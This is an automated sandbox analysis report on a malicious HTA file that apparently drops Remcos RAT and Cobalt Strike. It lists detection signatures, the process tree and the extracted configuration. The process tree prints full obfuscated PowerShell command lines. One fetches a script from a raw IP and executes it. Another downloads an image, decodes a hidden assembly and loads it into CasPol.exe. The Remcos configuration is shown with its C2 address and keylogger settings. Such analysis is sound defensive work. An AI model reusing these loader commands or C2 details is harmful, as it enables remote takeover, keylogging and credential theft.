Edit tour
Windows
Analysis Report
verynicegirlwalkingarounftheworldmuuuah.hta
Overview
General Information
| Sample name: | verynicegirlwalkingarounftheworldmuuuah.hta |
| Analysis ID: | 1590499 |
| MD5: | 6dc778742c1403851ff2659fcee24150 |
| SHA1: | 7cc386b4ddf71303ed5a42a3ba8c8c8404ff5660 |
| SHA256: | ba54736b563266fd4f32553c63737596d3208a9112cb47d6513f68db2c2e6b67 |
| Tags: | htauser-lontze7 |
| Infos: |   |
 | |
Detection
Cobalt Strike, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7236 cmdline: mshta.exe "C:\Users\ user\Deskt op\verynic egirlwalki ngarounfth eworldmuuu ah.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 7348 cmdline: "C:\Window s\system32 \cmd.exe" "/C POWerS HeLl -ex bYPasS -NOp -w 1 -c dEVICECRE dentiALdEp LOYMENT ; InvokE-E XprEssioN( $(Invoke-e xPREssiON( '[syStem.t exT.enCOdi NG]'+[cHAR ]0X3A+[CHa r]58+'utF8 .GEtsTRING ([SYsTem.c oNVERt]'+[ ChAr]0x3A+ [CHAr]0x3a +'frOMbAsE 64sTrIng(' +[CHAR]34+ 'JGJvWG5Vd SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGFkRC1UW VBFICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 NZU1iZXJER UZJbml0SW9 OICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJVckxNT 04uZExsIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQ2hhc lNldCA9IEN oYXJTZXQuV W5pY29kZSl dcHVibGljI HN0YXRpYyB leHRlcm4gS W50UHRyIFV STERvd25sb 2FkVG9GaWx lKEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBILHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBLb29QLHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBFcVosdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICB0a WdtLEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBJb mdUWWpaeFV NKTsnICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1OYW1FICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICJmVmYiI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1uYW1 lc1BBY0UgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgRWdOYSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtUGFzc 1RocnU7ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICRib1huV XU6OlVSTER vd25sb2FkV G9GaWxlKDA sImh0dHA6L y8xNzIuMjQ 1LjEyMy43L zc3L3NlZXR oZWJlc3R0a GluZ3Nmb3J nZXRtZWJhY 2t3aXRoZ29 vZG5ld3N0a GluZ3MudEl GIiwiJEVOV jpBUFBEQVR BXHNlZXRoZ WJlc3R0aGl uZ3Nmb3JnZ XRtZWJhY2t 3aXRoZ29vZ G5ld3N0aGk udmJTIiwwL DApO1N0YVJ ULXNsZUVQK DMpO2luVm9 rRS1FWHByR VNTaU9OICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICIkRW52O kFQUERBVEF cc2VldGhlY mVzdHRoaW5 nc2Zvcmdld G1lYmFja3d pdGhnb29kb mV3c3RoaS5 2YlMi'+[Ch aR]34+'))' )))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7392 cmdline: POWerSHeLl -e x bY PasS -NOp -w 1 - c dE VICECREden tiALdEpLOY MENT ; I nvokE-EXpr EssioN($(I nvoke-exPR EssiON('[s yStem.texT .enCOdiNG] '+[cHAR]0X 3A+[CHar]5 8+'utF8.GE tsTRING([S YsTem.coNV ERt]'+[ChA r]0x3A+[CH Ar]0x3a+'f rOMbAsE64s TrIng('+[C HAR]34+'JG JvWG5VdSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICA9ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIG FkRC1UWVBF ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1NZU 1iZXJERUZJ bml0SW9OIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICdbRGxs SW1wb3J0KC JVckxNT04u ZExsIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgQ2hhclNl dCA9IENoYX JTZXQuVW5p Y29kZSldcH VibGljIHN0 YXRpYyBleH Rlcm4gSW50 UHRyIFVSTE Rvd25sb2Fk VG9GaWxlKE ludFB0ciAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBILHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBL b29QLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBF cVosdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICB0aWdt LEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBJbmdU WWpaeFVNKT snICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1O YW1FICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC JmVmYiICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1uYW1lc1 BBY0UgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg RWdOYSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC Rib1huVXU6 OlVSTERvd2 5sb2FkVG9G aWxlKDAsIm h0dHA6Ly8x NzIuMjQ1Lj EyMy43Lzc3 L3NlZXRoZW Jlc3R0aGlu Z3Nmb3JnZX RtZWJhY2t3 aXRoZ29vZG 5ld3N0aGlu Z3MudElGIi wiJEVOVjpB UFBEQVRBXH NlZXRoZWJl c3R0aGluZ3 Nmb3JnZXRt ZWJhY2t3aX RoZ29vZG5l d3N0aGkudm JTIiwwLDAp O1N0YVJULX NsZUVQKDMp O2luVm9rRS 1FWHByRVNT aU9OICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC IkRW52OkFQ UERBVEFcc2 VldGhlYmVz dHRoaW5nc2 ZvcmdldG1l YmFja3dpdG hnb29kbmV3 c3RoaS52Yl Mi'+[ChaR] 34+'))'))) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 7544 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\2qf3pwzp \2qf3pwzp. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7560 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S8DF2.tmp" "c:\Users \user\AppD ata\Local\ Temp\2qf3p wzp\CSCB3A 240E1501D4 8929A893BA 197F62C4E. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
wscript.exe (PID: 7600 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebestthing sforgetmeb ackwithgoo dnewsthi.v bS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 7652 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " if ($null -ne $PSVer sionTable -and $PSVe rsionTable .PSVersion -ne $null ) { [void] $PSVersion Table.PSVe rsion } el se { Write -Output 'P owerShell version No t availabl e' };if ($ null -ne $ PSVersionT able -and $PSVersion Table.PSVe rsion -ne $null) { [ void]$PSVe rsionTable .PSVersion } else { Write-Outp ut 'PowerS hell versi on Not ava ilable' }; $originalT ext = '#x# .mihrofgni mocsyad#ae rgh#iwsgni h##sebgnis sik/77/7.3 21.542.271 //:p##h';$ restoredTe xt = $orig inalText - replace '# ', 't';$wh eal = 'htt ps://res.c loudinary. com/dmwnme mcm/image/ upload/v17 36770712/m q8ht5gredx 4ck4rramp. jpg ';$nec tars = New -Object Sy stem.Net.W ebClient;$ polyedrons = $nectar s.Download Data($whea l);$tropic al = [Syst em.Text.En coding]::U TF8.GetStr ing($polye drons);$bu bbas = '<< BASE64_STA RT>>';$fai rhood = '< <BASE64_EN D>>';$fulm inatory = $tropical. IndexOf($b ubbas);$qu adriloge = $tropical .IndexOf($ fairhood); $fulminato ry -ge 0 - and $quadr iloge -gt $fulminato ry;$fulmin atory += $ bubbas.Len gth;$oxytr ope = $qua driloge - $fulminato ry;$moorco cks = $tro pical.Subs tring($ful minatory, $oxytrope) ;$pelisse = -join ($ moorcocks. ToCharArra y() | ForE ach-Object { $_ })[- 1..-($moor cocks.Leng th)];$unre igned = [S ystem.Conv ert]::From Base64Stri ng($peliss e);$chevau x = [Syste m.Reflecti on.Assembl y]::Load($ unreigned) ;$cutesily = [dnlib. IO.Home].G etMethod(' VAI');$cut esily.Invo ke($null, @($restore dText, 'pu lvilliform ', 'pulvil liform', ' pulvillifo rm', 'CasP ol', 'pulv illiform', 'pulvilli form','pul villiform' ,'pulvilli form','pul villiform' ,'pulvilli form','pul villiform' ,'1','pulv illiform', 'TaskName' ));if ($nu ll -ne $PS VersionTab le -and $P SVersionTa ble.PSVers ion -ne $n ull) { [vo id]$PSVers ionTable.P SVersion } else { Wr ite-Output 'PowerShe ll version Not avail able' };if ($null -n e $PSVersi onTable -a nd $PSVers ionTable.P SVersion - ne $null) { [void]$P SVersionTa ble.PSVers ion } else { Write-O utput 'Pow erShell ve rsion Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 8052 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 8132 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\ao ckdegvxmbv benvzdaftk nehua" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 8140 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\ki hdewroluta dkbziovgwx anibscod" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 8160 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\nk mnepbqzcln nyxdazhahc ueqhcdhonm rf" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["172.245.123.12:8690:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ET2B3I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Click to see the 20 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| Click to see the 7 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||